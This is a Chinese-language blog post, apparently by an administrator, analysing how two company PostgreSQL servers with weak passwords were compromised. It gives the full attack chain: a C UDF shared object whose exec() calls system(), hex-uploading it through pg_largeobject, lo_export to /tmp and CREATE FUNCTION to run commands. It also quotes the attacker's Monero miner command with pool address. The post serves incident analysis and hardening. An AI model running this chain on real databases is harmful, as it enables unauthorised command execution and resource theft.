postgresql 弱口令 UDF 攻击

本文涉及的产品
云原生数据库 PolarDB MySQL 版,通用型 2核4GB 50GB
云原生数据库 PolarDB PostgreSQL 版,标准版 2核4GB 50GB
简介: 1.首先通过端口扫描到弱口令 postgresql 账号密码 2.UDF  自定义函数,本地首先编译制作 so 文件,并上传到服务器 参考:https://www.

1.首先通过端口扫描到弱口令 postgresql 账号密码

2.UDF  自定义函数,本地首先编译制作 so 文件,并上传到服务器

参考:https://www.postgresql.org/docs/9.5/static/xfunc-c.html



 gcc cmd2.c -I`pg_config --includedir-server` -fPIC -shared -o cmd.so



cmd2.c:


#include "stdlib.h"
#include "postgres.h"
#include <string.h>
#include "utils/geo_decls.h"


#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif


/* by value */
int exec(int arg){
  system("ls /root -al> /tmp/result");
  return arg;
}
int
add_one(int arg)
{
    return arg + 1;
}


/* by reference, fixed length */


float8 *
add_one_float8(float8 *arg)
{
    float8    *result = (float8 *) palloc(sizeof(float8));


    *result = *arg + 1.0;


    return result;
}


Point *
makepoint(Point *pointx, Point *pointy)
{
    Point     *new_point = (Point *) palloc(sizeof(Point));


    new_point->x = pointx->x;
    new_point->y = pointy->y;


    return new_point;
}


/* by reference, variable length */


text *
copytext(text *t)
{
    /*
     * VARSIZE is the total size of the struct in bytes.
     */
    text *new_t = (text *) palloc(VARSIZE(t));
    SET_VARSIZE(new_t, VARSIZE(t));
    /*
     * VARDATA is a pointer to the data region of the struct.
     */
    memcpy((void *) VARDATA(new_t), /* destination */
           (void *) VARDATA(t),     /* source */
           VARSIZE(t) - VARHDRSZ);  /* how many bytes */
    return new_t;
}


text *
concat_text(text *arg1, text *arg2)
{
    int32 new_text_size = VARSIZE(arg1) + VARSIZE(arg2) - VARHDRSZ;
    text *new_text = (text *) palloc(new_text_size);


    SET_VARSIZE(new_text, new_text_size);
    memcpy(VARDATA(new_text), VARDATA(arg1), VARSIZE(arg1) - VARHDRSZ);
    memcpy(VARDATA(new_text) + (VARSIZE(arg1) - VARHDRSZ),
           VARDATA(arg2), VARSIZE(arg2) - VARHDRSZ);
    return new_text;
}


java工具: 将cmd.so 二进制文件做成16进制字符串,每行<=2kB

public static String byteToArray(byte[] data){  
   String result="";  
   for (int i = 0; i < data.length; i++) {  
   
       result+=Integer.toHexString((data[i] & 0xFF) | 0x100).toUpperCase().substring(1, 3);
       if((i+1)%2048==0){
    result+="\r\n";
    }
   }  
   return result;  
}  
public static void main(String[] args) throws Exception {
byte[] data=FileUtils.readFileToByteArray(new File("C:\\Users\\martin\\Downloads\\package\\libtest.so"));

String result=byteToArray(data);
System.out.println(result);
}



通过sql命令,将cmd.so 导出到 /tmp 目录下

select lo_creat(-1);
delete from pg_largeobject where loid=390334


select * from pg_largeobject where loid=390334


insert into pg_largeobject (loid,pageno,data) values(390334,0,decode(''FFXXXXXXXXXXXXX....','hex'))
;
insert into pg_largeobject (loid,pageno,data) values(390334,1,decode(''FFXXXXXXXXXXXXX....','hex'))
;
insert into pg_largeobject (loid,pageno,data) values(390334,2,decode('FFXXXXXXXXXXXXX....','hex'))
;
insert into pg_largeobject (loid,pageno,data) values(390334,3,decode(''FFXXXXXXXXXXXXX....','hex'))
;


SELECT lo_export(390334, '/tmp/cmd.so');   //导出 到 /tmp 目录


创建函数:

CREATE or replace FUNCTION exec(integer) RETURNS integer
     AS '/tmp/cmd.so', 'exec'
     LANGUAGE C STRICT;


执行自定义函数cmd.c的exec方法:
select exec('1')


可以在方法中执行启动进程等,postgres我们公司2台阿里云服务器被人用这种方式 放了挖矿程序导致cpu占用率100%,研究了一天搞清楚了原理,解决方法将postgresql密码修改复杂


附:

黑客启动的挖矿程序执行进程:

/tmp/iftghlv -c x -M 
stratum+tcp://49rR8E9A3CZN2jdNpJK4NMLYKCM9TLbSEAB4m9FxLgXZC4pvz6mWfxK6NRHv9Y3C3Xa9nqRLjUUHfU7werrSne1DP3Ufgw2:x@xmr.crypto-pool.fr:3333/xmr







相关实践学习
使用PolarDB和ECS搭建门户网站
本场景主要介绍基于PolarDB和ECS实现搭建门户网站。
阿里云数据库产品家族及特性
阿里云智能数据库产品团队一直致力于不断健全产品体系,提升产品性能,打磨产品功能,从而帮助客户实现更加极致的弹性能力、具备更强的扩展能力、并利用云设施进一步降低企业成本。以云原生+分布式为核心技术抓手,打造以自研的在线事务型(OLTP)数据库Polar DB和在线分析型(OLAP)数据库Analytic DB为代表的新一代企业级云原生数据库产品体系, 结合NoSQL数据库、数据库生态工具、云原生智能化数据库管控平台,为阿里巴巴经济体以及各个行业的企业客户和开发者提供从公共云到混合云再到私有云的完整解决方案,提供基于云基础设施进行数据从处理、到存储、再到计算与分析的一体化解决方案。本节课带你了解阿里云数据库产品家族及特性。
目录
相关文章
|
关系型数据库 数据安全/隐私保护 PostgreSQL
postgresql口令文件 追加
特殊情况说明
79 0
|
关系型数据库 数据库 数据安全/隐私保护
postgresql 口令文件
远程备份,登录时手工输入密码;尤其 pg_dumpall 需要多次连接到PostgreSQL服务器(每个数据库一次),可能需要多次输入密码,PostgreSQL可以通过密码文件实现免密登录
180 0
|
弹性计算 关系型数据库 数据库
PostgreSQL 如何让心跳永远不死,支持半同步自动同步、异步升降级 - udf 心跳
标签 PostgreSQL , 同步 , 半同步 , 流复制 , 心跳 , 自动降级 , 自动升级 , dblink , 异步调用 背景 在心跳时,通过自定义UDF,实现心跳永远不被堵塞,并且支持更加当前的配置自动的进行同步、异步模式的升降级。实现半同步的功能。 UDF输入 1、优先模式(同步、异步) 2、同步等待超时时间 当优先为同步模式时,假设当前为同步配置,如果备库异常导致
1927 0
|
关系型数据库 数据库 PostgreSQL
PostgreSQL 如何让心跳永远不死,支持半同步自动同步、异步升降级 - udf 心跳
PostgreSQL 如何让心跳永远不死,支持半同步自动同步、异步升降级 - udf 心跳
1164 0
|
SQL 关系型数据库 数据库
PostgreSQL sharding : citus 系列4 - DDL 操作规范 (新增DB,TABLE,SCHEMA,UDF,OP,用户等)
标签 PostgreSQL , citus , 新增对象 , 新增数据库 , 新增用户 背景 citus是PG的一个插件,插件主要针对普通SQL(非UTILITY)加HOOK进行了一些ROUTE处理,同时使用UDF对表进行新建分区的操作。
1855 0
|
关系型数据库 数据库 PostgreSQL
PostgreSQL 10.1 手册_部分 IV. 客户端接口_第 33 章 libpq - C 库_33.15. 口令文件
33.15. 口令文件 一个用户主目录中的.pgpass文件可能包含在连接需要时使用的口令(并且其他情况不会指定口令)。在微软的 Windows 上该文件被命名为%APPDATA%\postgresql\pgpass.conf(其中%APPDATA%指的是用户配置中的应用数据子目录)。
1369 0
|
关系型数据库 MySQL 数据库
|
关系型数据库 MySQL Linux